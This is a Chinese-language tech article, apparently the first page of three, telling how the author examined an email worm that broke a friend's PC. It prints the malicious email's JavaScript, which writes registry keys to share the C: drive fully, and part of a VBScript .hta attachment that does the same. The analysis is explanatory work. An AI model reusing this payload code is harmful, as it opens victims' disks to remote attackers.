最近网络上的邮件病毒满天飞舞,令人防不胜防。小弟的邮箱地址也不知怎么被添加到几份邮件列表中,结果现在平均下来收10封信有8封垃圾邮件。不光是广告,而且最近常有一些不明身份的邮件发到我的邮箱来,并且都带有附件,通常附件为doc和exe文件。可恶!看来不是SirCam病毒就是“求职信”病毒。Foxmail的过滤器也是杯水车薪——Spammer每天都从新的原地址发来垃圾邮件。每天收信都战战兢兢,就像是在排雷!
忽一日,好友打电话来求救,说机器不能启动了。我一听,就拿着工具软件一路小跑到他家,也不多问——直接开机(好友刚学电脑不久,水平肯定……),一看“缺少系统文件”,这简单,启动盘启动,“Sys A: C: ”搞定!重启,蓝天白云映入眼帘……“可能是有病毒吧,要不然系统文件会无故丢失?”我一边说一边操起鼠标。“怎么启动速度这么慢?”我问他,他摇摇头后说“昨天收了信后就成这样了,我也不知道怎么回事。”我打开Outlook Express,发现有封名为“笑林广记笑话集”的信不能读,OE提示说上一次没有正常退出,可能是由看过的最后一封邮件所引起的。我就点击“查看此邮件”,里面有一个名为Laugh.hta的附件,我试着一执行,结果硬盘灯狂闪。不对头!我立即按下三键,在任务列表中没有发现邮件病毒常见的WScript进程,倒是多了一个MSHTA的不明进程。这个进程肯定有问题,马上用“Windows优化大师”中的进程管理器杀掉了它——果然,硬盘不响了。
朋友说他也点过这个附件。我就打开资源管理器,首先发现C盘的盘符上有一只手托着——C盘被共享了!莫名其妙,马上改为不共享。接着又发现C盘根目录下的Io.sys大小不对——由219K变成了3K,又被病毒写坏了!我这回得好好研究你一下!再打开OE,不理会OE的关于上一次没有正常退出提示,直接双击该可疑邮件,点击菜单上的“查看”——“编辑源文件”,终于看到了它的庐山真面目。
〈!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"〉
〈HTML〉〈HEAD〉
〈META content="text/html; charset=gb2312" http-equiv=Content-Type〉
〈META content="MSHTML 5.00.2614.3500" name=GENERATOR〉
〈STYLE〉〈/STYLE〉
〈/HEAD〉
〈BODY bgColor=#c0c0c0〉
〈DIV align=center〉〈FONT size=4〉〈STRONG〉笑林广记笑话集〈/STRONG〉〈/FONT〉〈/DIV〉
〈DIV align=center〉 〈/DIV〉
〈DIV align=left〉〈FONT size=2〉
你好!我们是笑林广记笑话网,这里有大量的XXX级笑话,绝对笑死你!欢迎访问!附件中有极品笑话N篇,友情赠送!〈A href="http://www.sexlaugh.com.cn"〉Http://www.sexlaugh.com.cn〈/A〉〈/FONT〉〈/DIV〉
〈script language=JavaScript〉
function f() file://改写注册表的函数
{
var aa,ss;
aa=document.applets[0];
aa.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
aa.createInstance();
ss=aa.GetObject();
ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Network\\LanMan\\C$\\Flags",302,"REG_DWORD");
ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Network\\LanMan\\C$\\Type",0,"REG_DWORD");
ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Network\\LanMan\\C$\\Path","C:\\");
}
function init()
{
setTimeout("f()", 1000); file://每过1000毫秒就再次递归调用f()
}
init(); file://调用函数
〈/script〉
〈/BODY〉〈/HTML〉
这封邮件就是利用了MS.ActiveX元件的写注册表的功能,只要你一读这封信,它就会在注册表的HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
Network\LanMan中添加了一个键值C$,并且将C盘改为完全共享!这样黑客可以用SMB扫描器直接登陆你的C盘,他可以在硬盘中随意拷贝文件,删除文件,添加文件……并且可以给你上传木马,永久而全面地控制你的机器。
再来看一看附件Laugh.hta吧。我查看了一下“文件类型”,发现“.hta”后缀名其实是HTML Application文件,可以由Mshta.exe解释执行。看来也是和WSH、VBS一样的文本文件,就将它导出为Txt文件——哈哈!全看到了!
〈html〉
〈script language=vbs〉
On Error Resume Next· 容错语句,避免程序崩溃
set aa=CreateObject("WScript.Shell")·建立WScript对象
Set fs = CreateObject("Scripting.FileSystemObject")·建立文件系统对象
Set dir1 = fs.GetSpecialFolder(0)·得到Windows路径
Set dir2 = fs.GetSpecialFolder(1)·得到System路径
dir1=dir1+"\START MENU\PROGRAMS\启动"
aa.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersion\
Network\LanMan\S$\Flags",302,"REG_DWORD"·写入Dword值Flag 此新闻共有3页 1 2 3 |
